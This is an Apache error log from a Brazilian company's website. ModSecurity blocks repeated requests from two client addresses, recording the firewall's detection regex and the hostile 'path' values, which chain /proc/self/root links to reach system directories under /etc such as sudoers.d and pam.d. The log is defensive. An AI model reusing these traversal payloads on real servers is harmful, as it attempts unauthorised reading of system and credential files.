[Tue Mar 17 18:42:26.243970 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:54064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKwgeiSKl8TjouI-YyywAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:29.241456 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:34452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKxaBJNF7axNlVR0UzbwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:29.446882 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:34452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKxaBJNF7axNlVR0UzcAAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:32.875650 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.243.128:53012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKyHIk7brgkOH-rIWnpwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:33.714485 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:34464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKyRj0p0SRWAqcjGGUugAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:34.237248 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:34464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKyhj0p0SRWAqcjGGUvAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:46.405791 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:42:48.971683 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:34478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK2AeiSKl8TjouI-Yy1gAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:50.248420 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:38346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK2uyqAr6etmhZHNpCvAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:52.363611 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:38352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK3HIk7brgkOH-rIWnsQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:53.761195 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:38364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK3fPqhzTj3BvfDX-iPAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:55.145445 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:38376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK33Ik7brgkOH-rIWntAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:43:08.123822 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52938] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:43:15.639333 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:48542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK84h-PF_25v4hFRCFVgAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:43:18.465916 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:44980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK9sU6Sx0TG1YjmQjJZAAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:43:20.941459 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:44994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnK-NY0UrI5A3LftIwZTwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:43:30.045849 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53474] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:43:39.348824 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.243.128:40352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLC4h-PF_25v4hFRCFbAAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:43:45.375227 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:45006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLEaBJNF7axNlVR0UzlAAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:43:52.127466 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:43:54.252065 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:51070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLGvPqhzTj3BvfDX-iTAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:44:01.210134 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.243.128:58916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLIcU6Sx0TG1YjmQjJdgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:44:03.411468 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.243.128:33566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLI3Ik7brgkOH-rIWnzQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:44:05.912407 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.243.128:33568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLJaBJNF7axNlVR0UznQAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:44:07.546617 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.128:33572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLJweiSKl8TjouI-Yy9gAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:44:17.128661 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54906] AH01075: Error dispatching request to : (polling)
